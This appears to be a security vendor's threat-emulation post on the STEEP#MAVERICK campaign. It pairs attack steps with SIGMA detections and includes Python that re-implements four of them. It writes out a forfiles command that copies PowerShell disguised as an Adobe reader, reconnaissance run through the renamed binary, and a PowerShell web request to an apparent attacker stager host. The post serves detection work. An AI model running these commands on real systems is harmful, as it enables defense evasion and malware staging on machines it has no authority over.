
STEEP#MAVERICK: Rename Adobe

November 3, 2022

The next installment of our STEEP#MAVERICK emulation series highlights a defense evasion technique leveraged by the threat actor shortly after initial infection. As in many targeted campaigns, initial infection begins with a phishing email containing a malicious attachment. In STEEP#MAVERICK, the email contained a compressed (.zip) file with a shortcut (.lnk) file inside. The shortcut file hides the command it runs behind forfiles.exe, a legitimate Windows utility that can launch arbitrary commands on the attacker's behalf.

Our emulation begins here with a step where the threat actor calls forfiles.exe to copy powershell.exe to C:\Windows as AdobeAcrobatPDFReader.exe. The copy is byte-for-byte PowerShell, so its PE metadata (OriginalFileName, Description) still identify it as such; that mismatch between the on-disk name and the PE metadata is what the renamed-binary rules in the table below key on.

We then use the renamed PowerShell to obtain the name of the domain the device belongs to and whether a hypervisor is present (Get-ComputerInfo -Property CsDomain, HyperVisorPresent). The threat actor did not perform this step in the campaign; we include it to provide an additional detection opportunity.

In the following step we mimic a C2 connection to hxxps://terma[.]dev/0 to pull down the initial stager.

Clean-up steps that remove the renamed PowerShell copy from C:\Windows run after a three-minute delay.

Detection Opportunities

Each step below lists the SCYTHE request (the command the emulation runs) followed by the SIGMA rule(s) that detect it and their author(s).

Step 4
Request: run forfiles.exe /c "cmd.exe /c copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\AdobeAcrobatPDFReader.exe
SIGMA Rule(s) (Author(s)):
  Creation of an Executable by an Executable (frack113)
  Indirect Command Execution (E.M. Anhaus, oscd.community)
  Suspicious Copy From or To System32 (Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update))
  Suspicious In-Memory Module Execution (Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro)

Step 5
Request: run C:\windows\AdobeAcrobatPDFReader.exe /c Get-ComputerInfo -Property CsDomain, HyperVisorPresent
SIGMA Rule(s) (Author(s)):
  Highly Relevant Renamed Binary (Matthew Green - @mgreen27, Florian Roth)
  In-memory PowerShell (Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton)
  Renamed Binary (Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades))
  Renamed PowerShell (Florian Roth, frack113)
  Suspicious In-Memory Module Execution (Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro)

Step 8
Request: upsh --cmd Invoke-Command -ScriptBlock { try { $response = Invoke-WebRequest -Uri https://terma.dev/0 -TimeoutSec 15 } catch { $_.Exception.Response.StatusCode.Value__ } }
SIGMA Rule(s) (Author(s)):
  Alternate PowerShell Hosts (Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research))
  Alternate PowerShell Hosts Pipe (Roberto Rodriguez @Cyb3rWard0g, Tim Shelton)
  In-memory PowerShell (Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton)
  Raw Disk Access Using Illegitimate Tools (Teymur Kheirkhabarov, oscd.community)
  Suspicious WSMAN Provider Image Loads (Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research))
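To make the detection opportunities concrete, the following is an added example written for this page; it is not SCYTHE code and not the SIGMA rules themselves, but simplified re-implementations of four of them (Renamed PowerShell, Indirect Command Execution, Suspicious Copy From or To System32, Alternate PowerShell Hosts) run over constructed Sysmon-style events. The field names follow Sysmon Event ID 1 (process creation) and Event ID 7 (image load); the events, including the agent.exe path used as the unmanaged PowerShell host for step 8, are constructed for the example and are not captured telemetry. The real SIGMA rules match on more fields (Description, Product, Hashes) than shown here.

```python
"""Simplified re-implementations of four detections from the table above,
run over constructed Sysmon-style events (Event ID 1 = process creation,
Event ID 7 = image load). Sample events are constructed, not real telemetry."""
import ntpath
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int                   # 1 = ProcessCreate, 7 = ImageLoad
    image: str                      # full path of the process image
    command_line: str = ""          # EID 1 only
    original_file_name: str = ""    # name from the PE header, EID 1 only
    image_loaded: str = ""          # EID 7 only


# Images that legitimately host the PowerShell engine.
POWERSHELL_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}


def _base(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return ntpath.basename(path).lower()


def renamed_powershell(e: Event) -> bool:
    """PE header says PowerShell but the image runs under another name
    (the AdobeAcrobatPDFReader.exe copy in step 5)."""
    return (e.event_id == 1
            and e.original_file_name.lower() == "powershell.exe"
            and _base(e.image) not in POWERSHELL_HOSTS)


def indirect_command_execution(e: Event) -> bool:
    """forfiles.exe used as a proxy to launch another interpreter (step 4)."""
    cl = e.command_line.lower()
    return (e.event_id == 1
            and _base(e.image) == "forfiles.exe"
            and "/c" in cl
            and any(x in cl for x in ("cmd", "powershell", "pwsh")))


def suspicious_copy_from_system32(e: Event) -> bool:
    """copy/xcopy of a System32 or SysWOW64 binary somewhere else (step 4)."""
    cl = e.command_line.lower()
    return (e.event_id == 1
            and any(verb in cl for verb in ("copy ", "xcopy "))
            and any(src in cl for src in ("\\system32\\", "\\syswow64\\")))


def alternate_powershell_host(e: Event) -> bool:
    """System.Management.Automation.dll loaded by a process that is not a
    known PowerShell host (the unmanaged PowerShell used in step 8)."""
    return (e.event_id == 7
            and _base(e.image_loaded) == "system.management.automation.dll"
            and _base(e.image) not in POWERSHELL_HOSTS)


RULES = {
    "Renamed PowerShell": renamed_powershell,
    "Indirect Command Execution": indirect_command_execution,
    "Suspicious Copy From or To System32": suspicious_copy_from_system32,
    "Alternate PowerShell Hosts": alternate_powershell_host,
}


def evaluate(events):
    """Map each event index to the names of the rules that fired on it."""
    return {i: [name for name, rule in RULES.items() if rule(e)]
            for i, e in enumerate(events)}


AUTOMATION_DLL = (r"C:\Windows\assembly\GAC_MSIL\System.Management.Automation"
                  r"\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")

# Constructed events following the emulation steps (not real telemetry).
SAMPLE_EVENTS = [
    # step 4: forfiles proxies cmd.exe, which copies powershell.exe out of System32
    Event(1, r"C:\Windows\System32\forfiles.exe",
          r'forfiles.exe /c "cmd.exe /c copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\AdobeAcrobatPDFReader.exe"',
          "forfiles.exe"),
    # step 5: the renamed copy runs; its PE header still says PowerShell.EXE
    Event(1, r"C:\Windows\AdobeAcrobatPDFReader.exe",
          r"C:\windows\AdobeAcrobatPDFReader.exe /c Get-ComputerInfo -Property CsDomain, HyperVisorPresent",
          "PowerShell.EXE"),
    # step 8: a hypothetical unmanaged host (agent.exe) loads the PowerShell engine
    Event(7, r"C:\Users\analyst\AppData\Local\Temp\agent.exe", image_loaded=AUTOMATION_DLL),
    # benign: the real powershell.exe loading its own engine must not fire
    Event(7, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", image_loaded=AUTOMATION_DLL),
    # benign: ordinary powershell.exe launch under its own name must not fire
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -NoProfile", "PowerShell.EXE"),
]


if __name__ == "__main__":
    for idx, hits in evaluate(SAMPLE_EVENTS).items():
        print(idx, _base(SAMPLE_EVENTS[idx].image), hits or "-")
```

The two benign events are the point of the exercise: a rule keyed on the PE metadata mismatch fires on AdobeAcrobatPDFReader.exe and stays quiet on the genuine powershell.exe, and the image-load rule catches an unmanaged host without flagging PowerShell loading its own engine. Renaming the binary defeats name-based allow lists but not OriginalFileName, Description, or hash-based matching, which is why the rules in the table remain effective.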

This post discusses active research by SCYTHE and other cited third parties into an ongoing threat.  The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.
